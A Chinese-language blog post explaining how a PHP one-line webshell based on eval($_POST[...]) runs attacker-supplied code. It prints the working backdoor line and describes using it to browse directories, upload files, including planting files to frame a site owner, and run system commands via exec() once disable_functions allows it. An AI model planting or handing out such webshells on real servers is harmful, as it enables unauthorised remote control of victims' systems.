一句話木馬(webshell)是如何執行命令的
在很多的滲透過程中,滲透人員會上傳一句話木馬(簡稱webshell)到目前web服務目錄繼而提權獲取系統權限,不論asp、php、jsp、aspx都是如此,那麽一句話木馬到底是如何執行的呢,下面我們就對webshell進行一個簡單的分析。
首先我們先看一個原始而又簡單的php一句話木馬。
<?php @eval($_POST[‘cmd‘]); ?>
看到這裏不得不贊美前輩的智慧。
對於一個稍微懂一些php的人而言,或者初級的安全愛好者,或者腳本小子而言,看到的第一眼就是密碼是cmd,通過post提交數據,但是具體如何執行的,卻不得而知,下面我們分析一句話是如何執行的。
這句話什麽意思呢?
php的代碼要寫在<?php ?>裏面,服務器才能認出來這是php代碼,然後才去解析。
@符號的意思是不報錯。
例如:
如果沒有@,如下圖,就會報錯
為什麽呢?
因為一個變量沒有定義,就被拿去使用了,
服務器就善意的提醒:Notice,你的xxx變量沒有定義。
這不就暴露了密碼嗎?
所以加上@
為什麽pw是密碼呢?
那就要來理解這句話的意思了
php裏面幾個超全局變量
$_GET、$_POST就是其中之一
$_POST[‘a‘];
意思就是a這個變量,用post的方法接收。
(傳輸數據的兩種方法,get、post,post是在消息體存放數據,get是在消息頭的url路徑裏存放數據(例如xxx.php?a=2))
eval()
把字符串作為PHP代碼執行
例如:eval("echo ‘a‘");其實就等於直接 echo ‘a‘;
再來看看<?php eval($_POST[‘pw‘]); ?>
首先,用post方式接收變量pw,比如接收到了:pw=echo ‘a‘;
這時代碼就變成<?php eval("echo ‘a‘;"); ?>
結果:
連起來意思就是:
用post方法接收變量pw,把變量pw裏面的字符串當做php代碼來執行
所以也就能這麽玩:
也就是說,你想執行什麽代碼,就把什麽代碼放進變量pw裏,用post傳輸給一句話木馬
你想查看目標硬盤裏有沒有小黃片,可以用php函數:opendir()和readdir()等等
想上傳點小黃片,誣陷站主,就用php函數:move_uploaded_file,當然相應的html要寫好
你想執行cmd命令,則用exec()
當然前提是:
php配置文件php.ini裏,關掉安全模式safe_mode = off,
然後在看看 禁用函數列表 disable_functions = proc_open, popen, exec, system, shell_exec ,把exec去掉,確保沒有exec。
(有些cms為了方便處理某些功能,會去掉的)
看看效果:
現在應該理解,為什麽說一句話短小精悍了吧!
我們在看一下一句話在菜刀之類的webshell管理工具裏面是如何一句話是如何執行的
其實可以很明顯看明白,其實執行的命令就和我們前面寫的哪樣進行輸入輸出,執行系統命令操作。
所以只要webshell有足夠高的權限,可以做任何你想做的事情。
本文出自 “tar0cisp” 博客,請務必保留此出處http://tar0cisp.blog.51cto.com/6253667/1937364
一句話木馬(webshell)是如何執行命令的